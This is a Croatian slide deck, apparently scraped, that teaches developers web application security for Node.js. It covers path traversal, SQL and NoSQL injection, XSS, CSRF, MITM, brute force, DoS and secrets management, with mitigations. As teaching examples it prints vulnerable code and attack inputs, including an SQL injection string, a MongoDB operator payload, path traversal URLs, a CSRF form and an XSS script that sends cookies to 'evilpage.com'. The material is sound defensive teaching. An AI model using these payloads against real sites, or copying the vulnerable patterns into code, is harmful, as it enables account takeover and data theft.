Anúncio

Mais conteúdo relacionado

Similar a Web App Security for Devs(20)

Anúncio

Web App Security for Devs

 1. Osnove sigurnosti web aplikacija Sergej Jakovljev
 2. Don't trust user input. Don't (re)invent your own security methods. TLDR;
 3. 1. Sigurnosni napadi
 4. Path Traversal • pokušaj pristupa fileovima kojima ne bismo trebali moći pristupiti GET http://webapplication.com/static/style.css app.get('/static/', (req, res) => { const filename = path.join(process.cwd(), 'static', req.uri); if (path.existsSync(filename)) { return res.end(fs.readFileSync(filename)); } res.status(404).end("Not found"); } GET http://webapplication.com/static/../app.js GET http://webapplication.com/static/../index.js
 5. Path Traversal • Ne pokušavat sami rješiti, puno bolji od vas su isto u tome pogrješili (više puta): https://expressjs.com/en/advanced/security-updates.html • Nije jednostavno kao što se čini: • %2e%2e%2f je isto kao ../ • %2e%2e/ je isto kao ../ • %252e%252e%255c je isto kao .. • Rješenje je koristiti postojeće metode (expess.static) app.use(express.static('files'))
 6. SQL Injection • napad koji zahtjeva • podaci dolaze od nesigurnog izvora • dinamički se stvara SQL upit pomoću istih username: sergej@axilis.com password: ES6>.net username: sergej@axilis.com password: " OR 1 -- SELECT * FROM users WHERE username = "sergej@axilis.com" AND password = "" OR 1 --" const username = req.body['username']; const password = req.body['password']; const q = ` SELECT * FROM users WHERE username = "${username}" AND password = "${password}" ` const results = database.exec(q); if (results.length) { resp.session['user'] = results[0]; } Login data Login data Query
 7. const username = req.body['username']; const password = req.body['password']; const q = ` SELECT * FROM users WHERE username = :username AND password = :password ` const results = database.prepare(q).exec({ password, username }); if (results.length) { resp.session['user'] = results[0]; } SQL Injection • Korištenje prepared statementa (Parameter Binding) const username = req.body['username']; const password = req.body['password']; const q = ` SELECT * FROM users WHERE username = "${username}" AND password = "${password}" ` const results = database.exec(q); if (results.length) { resp.session['user'] = results[0]; }
 8. NoSQL Injection GET http://api/?username[$gt]=&password[$gt]= http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html const q = { username: req.body['username'], password: req.body['password'] } Document.find(q).then((data) => { resp.session['user'] = results[0]; }) POST { "username": {"$gt": ""}, "password": {"$gt": ""} } JSON Request HTTP Request
 9. NoSQL Injection • ORM: mongoose (svi SchemaType-ovi automatski validirani) • čišćenje: mongo-sanitize • $where upiti opasni http://mongoosejs.com/docs/validation.html https://zanon.io/posts/nosql-injection-in-mongodb const sanitize = require('mongo-sanitize'); const q = { username: sanitize(req.body['username']), password: sanitize(req.body['password']) } Document.find(q).then(...) Sanitization
 10. XSS (Cross Site Scripting) • ubacivanje malicioznog koda u sadržaj stranice <script> window.location="http://evilpage.com/" + window.cookie; </script> Leverage agile frameworks to provide a robust synopsis for high level overviews. Iterative approaches to corporate strategy foster collaborative thinking to further the overall value proposition. Post.create({ content: req.body.content, user: req.session.user.id }); <div class="user-content"> <%- post.content %> </div> Model View Expected post Malicious post
 11. XSS • EJS • normalni <%= object %> tagovi escapeaju • specijalni <%- object %> eksplicitno ne rade esacpe • i dalje moguće napravit napad u nekim situacijama (renderanje u JS) • Prava prevencija je validacija podataka • Cookie koje je moguće postavit da su HTTP only http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/ http://www.managerjs.com/blog/2015/05/will-ejs-escape-save-me-from-xss-sorta/ React is safe. We are not generating HTML strings so XSS protection is the default.
 12. XSS #2 https://site.com/search?q=<script>alert('hacked')</script>&date=2012 var onServer = '6; doEvil();' <html> <script> var count = <%= onServer %>; </script> ... </html> Exploit using URL qs Route View
 13. XSS #2 • Content Security Policy (CSP) – zaglavlje koje kaže pregledniku od kuda smije učitavati JavaScript i CSS, ne spriječava skripte koje se cijele injectaju u stranicu • Ako je moguće upisati bilo što (formfield), jedino rješenje koje preostaje je sanitizacija sadržaja: express-sanitizer http://scottksmith.com/blog/2015/06/22/secure-node-apps-against-owasp-top-10-cross-site-scripting/ req.sanitize(item).escape();
 14. Session prediction • relativno jednostavan princip – otkrivanje kako se dodjeljuju session id-jevi • ako pogodimo session id odredenog korisnika, automatski smo ulogirani kao taj korisnik • vrijedi i za JSW • treba generirat nasumičan id http://techidiocy.com/_id-objectid-in-mongodb/
 15. CSRF - Cross-Site Request Forgery • slanje zahtjeva u ime korisnika bez korisikovog saznanja (posljedica da su poslani i Cookie podaci) • korištenje POST umjesto GET metode ne rješava problem GET http://bankingapp.com/transfer?to=1908&ammount=100 <img src="http://bankingapp.com/transfer?to=1908&ammount=100" /> POST http://bankingapp.com/transfer <form method="POST" action="http://bankingapp.com/transfer"> <input type="text" value="10000" hidden /> <input type="submit" value="Nauci JS!" /> </form> API endpoint API endpoint
 16. CSRF • više koraka ispunjavanja transakcija ne pomaže ako su predvidljivog toka • moguće pogledati refferer header (samo kod HTTPS-a) • korištenje nonce tokena prilikom submitanja podataka • dodatno CORS moze pomoći (samo JS requestovi u preglednicima) http://stackoverflow.com/questions/19793695/does-a-proper-cors-setup-prevent-xsrf
 17. MITM – Man in the middle https://www.incapsula.com/images/illustrations/web-app-security-mini-site/man-in-the-middle-mitm.jpg
 18. MITM • razlikuje se of sniffinga po tome što napadač može aktivno mijenjati podatke koji se prebacuju • slično kao i kod sniffinga podaci koje korisnik razmijenjuje su kompriminirani
 19. MITM • korištenje HTTPS-a prevenira u nekoj mjeri • prevenira dešifriranje podataka sa mreže (sniffinga) • ne prevenira MITM u potpunosti, ali će klijent biti upozoren da SSL certifikat nije onaj koji očekuje • kako je i sam redirect sa HTTP na HTTPS može bit presretnut, poželjno je omogućitii HSTS (HTTP Strict Transport Security), tada klijent automatski prebacuje HTTP u HTTPS zahtjeve • Cookie mogu postaviti secure zastavicu • Cookie moguće ograničiti na dio domene
 20. Brute force attack • isprobavanje svih mogućih kombinacija • na webu se manifestira u dva slučaja • brute force napad na stranice (pokušaj pogodka podataka) • dešifriranje ukradene baze lozinka (kada je napadač pomoću nekog drugog explota došao do baze)
 21. Brute force napad na web stranice • relativno je lagano rješiv, implementacijom ograničenja broja zahtjeva dohvata odredenih stranica • ne moraju nužno biti login podaci • može biti i pokušaj skidanja odredenih normalno nedostupnih resursa, koji su dostupni bez autorizacije (audio, video, i dr. sadržaja) • za express postoji jednostavan library sa podrškom za velik broj backing baza: express-brute
 22. Cracking lozinka • u tom trenutku su već lozinke ukradene, cilj je minimizirati štetu unaprijed • pretpostavka je da se ne može imati prejednostavne lozinke • preporučene hashing funkcije: Argon2, PBKDF2, scrypt, bcrypt • sve navedene imajujedan od faktora "težinu" hashiranja kako bi bilo teže otkriti lozinke korisnika • ovisno o svrhi aplikacije, razmislite o implementaciji 2-factor autorizaciji https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
 23. DoS – Denial of Service • cilj napada je onemogućiti normalni rad infrastrukture • najtipičniji npadi su DDoS (Distributed DoS) u kojima tisuće različitih klijenata se koristi za istovremeni napad kako bi se iscrpili svi dostupni resursi • Cash Overflow • specifična verzija napada ciljana na zloupotrebu servisa sa svrhom nabijanja troskova i dovoda do bankrota ili postizanja limita na kojima hosting provider onemogući stranicu • napadi na API-je koje koristite (npr. Weather API, Video Encoding API), exploitanje aplikacije za iskoristit 3rd party usluge https://www.owasp.org/index.php/Denial_of_Service
 24. DoS – Denial of Service • u najopćenitijoj formi gdje mogu dolaziti i milijuni zahtjeva po sekundi se ne može puno napravit • moguće je izbjeći situacije u kojima korisnički unos ima veliki utjecaj na workload potreban za izgenerirati odgovor • postaviti gornje limite na broj rezultata koji se vraćaju • analogno gdje se koristi korisnički input (argumenti for petlja) • ograničiti pristup servisima koji izvode zahtjevne radnje (resizanje slika, zipanje datoteka, dohvaćanje podataka sa drugih API-ja) • ograničiti pristup servisima koji stvaraju podatke (cache servis kojem je moguće zauzeti cijeli diskovni prostor zahtjevima različitih argumenata) • ograničit pristup dijelovimakoji pristupaju 3rd party API
 25. 2. Opasnosti
 26. Validacija podataka • vlastite metode validacije ili copy-paste sa Stackoverflow-a često mogu dovesti do loših ili krivih provjera podataka /[-+]?([0-9])*.?([0-9]*)/.test("<script>bok2</script>") /[-+]?([0-9])+.?([0-9]*)/.test("<script>bok2</script>") /^[-+]?([0-9])+.?([0-9]*)$/.test("<script>bok2</script>") https://www.owasp.org/index.php/Overly_Permissive_Regular_Expression => true => true => false
 27. http://stackoverflow.com/questions/46155/validate-email-address-in-javascript /S+@S+.S+/.test("<script>alert("bok")</script>@test.com") => true
 28. Deserijalizacija podataka • deserijalizirani podaci mogu biti važećeg formata ali to ne znaći da su sigurni (npr. NoSQL Injection) • moguće je zloupotrijebit aplikacijsku logiku (npr. rekurzivne reference) • korisnik mora biti autentificiran prije nego krenemo deserijalizirati podatke • moguć napad velikim payloadom (parsiraj 20MB JSON) https://www.owasp.org/index.php/Deserialization_of_untrusted_data
 29. 3. Prevencija
 30. Sigurnost "tajni" • nikad ne spremati API keyeve u kod • postoje jednostavna a puno sigurnija rješenja (.env file) https://wptavern.com/ryan-hellyers-aws-nightmare-leaked-access-keys-result-in-a-6000-bill-overnight “In total, there seemed to be around 600 servers running. The time between realizing all this and uploading my Git repository was approximately 12 hours.” export MONGO_STRING="mongodb://uri" export NODE_ENV="production" source ./.env .env file Terminal (set variables)
 31. AWS Credentials • koristiti IAM za postaviti AWS API keyeve • User – credentiali za korisnika ili API key • Group – skupina više usera • Role – dopuštenje odredenih prava (bez potrebe za AWS key-em) • dodjeliti minimalna potrebna prava • root accountobavezno zastititi 2-factor authenticationom
 32. Vault • jedan od servisa koji nude sigurnu pohranu i dohvat "tajni" • ideja shareati pristup samo podacima koji su neophodni • izbjegava se potreba za slanjem tajni "preko Slacka" :D • mogućnost oduzimanja pristupa https://www.amon.cx/blog/managing-all-secrets-with-vault/ https://spring.io/blog/2016/06/24/managing-secrets-with-vault https://www.codementor.io/slavko/how-to-install-vault-hashicorp-secure-deployment-secrets-du107xlqd
 33. AWS WAF – Web Application Firewall https://eng.goprimer.com/deploying-aws-s-web-application-firewall-on-cloudfront-with-dynamic-content-from-an-elastic-6e633ff97fd5
 34. AWS WAF • moguće je postaviti pravila koja preveniraju tipične napade kao što su SQL injection i XSS • moguće je ograničit pristup resursima ovisno o dijelovima HTTP zahtjeva (Cookie, Header, prvih 8kB tijela…) http://docs.aws.amazon.com/waf/latest/developerguide/web-acl-string-conditions.html AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content.
 35. Don't trust user input. Don't (re)invent your own security methods. Recap
 36. Preporučeni linkovi • The Basics of Web Application Security https://martinfowler.com/articles/web-security-basics.html • Open Web Application Security Project https://www.owasp.org/index.php/Main_Page • 6 Ways To Strengthen Web App Security http://www.darkreading.com/risk-management/6-ways-to- strengthen-web-app-security/d/d-id/1106197 • Helmet – set Express middlewareova koji povećavaju sigurnost https://www.npmjs.com/package/helmet
Anúncio